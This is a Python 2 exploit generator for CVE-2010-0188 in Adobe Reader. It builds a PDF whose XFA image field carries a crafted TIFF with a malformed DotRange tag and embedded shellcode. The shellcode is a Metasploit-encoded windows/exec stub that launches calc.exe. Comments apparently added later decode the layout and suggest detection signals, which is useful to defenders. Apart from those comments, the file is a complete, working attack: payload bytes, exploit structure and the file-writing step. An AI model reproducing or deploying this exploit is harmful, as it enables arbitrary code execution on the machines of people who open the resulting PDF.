__doc__='''
|
|
|
|
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
|
|
Product: Adobe Acrobat Reader
|
|
Version: <=8.3.0, <=9.3.0
|
|
CVE: 2010-0188
|
|
Author: villy (villys777 at gmail.com)
|
|
Site: http://bugix-security.blogspot.com/
|
|
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
|
|
------------------------------------------------------------------------
|
|
'''
import sys
import base64
import struct
import zlib
import StringIO
# Number of 0x90 filler bytes gen_tiff() writes between the 8-byte TIFF
# header and the shellcode, i.e. the shellcode begins at file offset
# 8 + 0x555 = 0x55D inside the TIFF.
SHELLCODE_OFFSET=0x555
# Offset of the first IFD as written into the TIFF header (sic: "OFSET").
# gen_tiff() sizes its second filler run so the IFD lands exactly here.
TIFF_OFSET=0x2038
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
#
# Payload placed inside the TIFF by CVE20100188Exploit.gen_tiff(): a
# Metasploit-generated, shikata_ga_nai-encoded stub whose stated command is
# calc.exe (per the banner above).  The literal below concatenates to 228
# bytes although the banner says 227; gen_tiff() sizes its filler with
# len(buf), so the discrepancy does not move the IFD.
#
# Detection note: the encoder makes these bytes polymorphic, so a signature
# on this string is brittle.  Key on the container instead -- a TIFF carried
# base64-encoded in an XFA image field inside a FlateDecode EmbeddedFile.
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
buf += "\x09\xc1\x5f\x00"
class CVE20100188Exploit:
    """Build a PDF whose embedded XFA form carries a crafted TIFF image.

    The class only writes bytes: ``gen_pdf()`` returns a PDF/XFA document
    in which an image field holds the base64-encoded TIFF produced by
    ``gen_tiff()``.  Parsing of that TIFF on the reader side is where the
    CVE named in the module banner is exercised.

    For defenders: the TIFF is reachable only after (1) inflating the
    FlateDecode ``EmbeddedFile`` stream in object 1 and (2) base64-decoding
    the ``ImageField1`` value inside ``<xfa:data>``.  Inspection that stops
    at the outer PDF structure sees neither the TIFF nor the shellcode.
    """

    def __init__(self,shellcode):
        # shellcode: raw byte string copied verbatim into the TIFF body.
        self.shellcode = shellcode
        # Built eagerly so gen_xml() can splice the same text in later.
        self.tiff64=base64.b64encode(self.gen_tiff())

    def gen_tiff(self):
        """Return the crafted little-endian TIFF as a byte string.

        Layout (offsets from the start of the returned string):
          0x0000  'II', 42, then the IFD offset (TIFF_OFSET = 0x2038)
          0x0008  SHELLCODE_OFFSET bytes of 0x90 filler
          0x055D  self.shellcode
          ...     more 0x90 filler, sized so the IFD starts at TIFF_OFSET
          0x2038  IFD: entry count 7, seven 12-byte entries, zero next-IFD
                  pointer, then the out-of-line entry data
        """
        tiff = '\x49\x49\x2a\x00'  # 'II*\0': little-endian TIFF magic
        tiff += struct.pack("<L", TIFF_OFSET)  # offset of the first IFD

        tiff += '\x90' * (SHELLCODE_OFFSET)
        tiff += self.shellcode
        # NOTE(review): this filler is sized from the module-level `buf`, not
        # from self.shellcode; the two agree only because __main__ passes buf.
        tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)

        # IFD.  Decoding the 12-byte entries (tag, type, count, value/offset):
        #   0x0100 ImageWidth      SHORT 1  0x2030
        #   0x0101 ImageLength     SHORT 1  1
        #   0x0103 Compression     SHORT 1  1 (none)
        #   0x0106 Photometric     SHORT 1  1
        #   0x0111 StripOffsets    LONG  1  8      -> strip = filler + shellcode
        #   0x0117 StripByteCounts LONG  1  0x2030    region (8 .. TIFF_OFSET)
        #   0x0150 DotRange        SHORT 0xCC  data at offset 0x2092
        # DotRange normally carries two values; a count of 0xCC (204) with
        # its data immediately after the IFD matches the public description
        # of the CVE in the banner (confirm against the advisory).  For
        # detection, tag 0x0150 with count > 2 in a TIFF found inside an XFA
        # image field is a usable rule.  The bytes after the zero next-IFD
        # pointer are that entry's data and are not decoded here.
        tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
        tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
        tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
        tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
        tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
        tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
        tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
        tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
        tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
        tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
        tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
        tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
        tiff += "\x00\x07"
        return tiff

    def gen_xml(self):
        """Return the XFA (XDP) form text with the base64 TIFF spliced in.

        The template declares one image field, ``ImageField1``; the
        ``<xfa:data>`` packet supplies its content as ``image/tif`` data
        inlined directly from ``self.tiff64``.  No XML escaping is applied
        to the spliced value; base64 output uses only [A-Za-z0-9+/=], so it
        cannot contain markup characters.  The checksum attribute on
        ``<form>`` is a fixed literal and is not recomputed.
        """
        xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>

'''
        return xml

    def gen_pdf(self):
        """Return the complete PDF as a byte string.

        The XDP from gen_xml() is zlib-compressed and written as object 1
        (``/Filter /FlateDecode``, ``/Type /EmbeddedFile``); the AcroForm
        dictionary (object 8) hands it to the XFA engine via
        ``/XFA [(template) 1 0 R]`` and the catalog (object 7) opens the
        document in attachments mode.  ``/Length`` is the only value
        computed from the output.

        The file ends with a bare ``xref`` keyword carrying no entries and a
        fixed ``startxref 14765`` that is not derived from the actual
        offsets, so the document presumably relies on the reader's
        damaged-file recovery to rebuild the cross-reference table.  An
        empty or inconsistent xref is itself a cheap heuristic signal for
        PDF scanners.
        """
        xml = zlib.compress(self.gen_xml())
        pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
        return pdf
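if __name__=="__main__":
    # CLI: <this script> output.pdf -- writes the generated document to that
    # path.  Python 2 syntax throughout, matching the rest of the file.
    print __doc__
    if len(sys.argv) != 2:
        print "Usage: %s [output.pdf]" % sys.argv[0]
        # The original fell through after printing usage and then raised
        # IndexError on sys.argv[1]; exit with a non-zero status instead.
        sys.exit(1)

    print "Creating Exploit to %s\n"% sys.argv[1]
    exploit=CVE20100188Exploit(buf)
    # Binary mode: the body contains a raw zlib stream.  The context manager
    # closes the handle even if gen_pdf() raises part-way through.
    with open(sys.argv[1],mode='wb') as f:
        f.write(exploit.gen_pdf())
    print "[+] done !"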